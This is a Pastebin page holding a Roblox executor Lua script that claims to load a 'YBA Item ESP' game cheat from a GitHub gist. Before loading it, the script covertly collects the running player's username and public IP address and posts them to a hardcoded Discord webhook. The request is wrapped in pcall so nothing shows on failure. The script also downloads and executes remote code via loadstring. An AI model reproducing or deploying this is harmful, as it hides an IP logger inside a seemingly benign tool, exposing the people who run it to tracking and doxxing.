Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local webh = "https://discord.com/api/webhooks/845743723064328263/d0nEiwTJTvPdL2AMZUwuWPweY12R9rdqZwsNxYe6tKFLU2I3ti2gYn9pmHmykcdd0rav"
- pcall(function()
- local data = {
- ["embeds"] = {
- {
- ["title"] = game:GetService("Players").LocalPlayer.Name,
- ["description"] = game:HttpGet("https://api.ipify.org")
- }
- }
- }
- if syn then
- local response = syn.request(
- {
- Url = webh,
- Method = 'POST',
- Headers = {
- ['Content-Type'] = 'application/json'
- },
- Body = game:GetService('HttpService'):JSONEncode(data)
- }
- );
- elseif request then
- local response = request(
- {
- Url = webh,
- Method = 'POST',
- Headers = {
- ['Content-Type'] = 'application/json'
- },
- Body = game:GetService('HttpService'):JSONEncode(data)
- }
- );
- elseif http_request then
- local response = http_request(
- {
- Url = webh,
- Method = 'POST',
- Headers = {
- ['Content-Type'] = 'application/json'
- },
- Body = game:GetService('HttpService'):JSONEncode(data)
- }
- );
- end
- end)
- if not pcall(function() return syn.protect_gui end) then
- syn = {}
- syn.protect_gui = function(egg)
- egg.Parent = game.CoreGui
- end
- end
- loadstring(game:HttpGet("https://gist.githubusercontent.com/Chrrxs/d2dfdcde75c2d11b173aa664c0a6b755/raw/YBA%2520Item%2520ESP.lua"))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement